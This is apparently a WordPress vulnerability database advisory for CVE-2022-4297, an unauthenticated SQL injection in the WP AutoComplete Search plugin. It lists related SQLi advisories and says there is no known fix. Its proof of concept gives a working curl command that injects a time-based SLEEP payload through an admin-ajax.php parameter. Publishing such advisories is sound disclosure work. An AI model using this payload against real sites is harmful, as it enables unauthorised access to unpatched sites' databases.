WP AutoComplete Search <= 1.0.4 – Unauthenticated SQLi | CVE 2022-4297 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users, leading to an unauthenticated SQL injection

Proof of Concept

Extract the nonce from the index page (search for "wp_autosearch_config", look for the "nonce" field)

Invoke the following curl command, with the nonce in place, to induce a 5 second sleep:

time curl -i 'https://example.com/wp-admin/admin-ajax.php' \
    --data 'action=wi_get_search_results&security=NONCE&q=123" AND (SELECT 1 FROM (SELECT(SLEEP(5)))HIdl)-- CmWf'

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

e2dcc76c-65ac-4cd6-a5c9-6d813b5ac26d

Timeline

Publicly Published

2022-12-12 (about 3 years ago)

Added

2022-12-12 (about 3 years ago)

Last Updated

2022-12-12 (about 3 years ago)

Other

Published

Title

Published

2023-06-08

Title

Ultimate Addons for Contact Form 7 3.1.23 - Subscriber+ SQLi

Published

2025-06-23

Title

Amely < 3.2.0 - Unauthenticated SQL Injection

Published

2025-02-03

Title

Payment Forms for Paystack < 4.0.2 - Authenticated (Administrator+) SQL Injection

Published

2011-07-20

Title

Social Slider < 7.4.2 - SQL Injection

Published

2020-04-25

Title

Duplicate Page and Post < 2.5.7 & WP Post Page Clone < 1.1 - SQL Injections due to Duplicated Snippets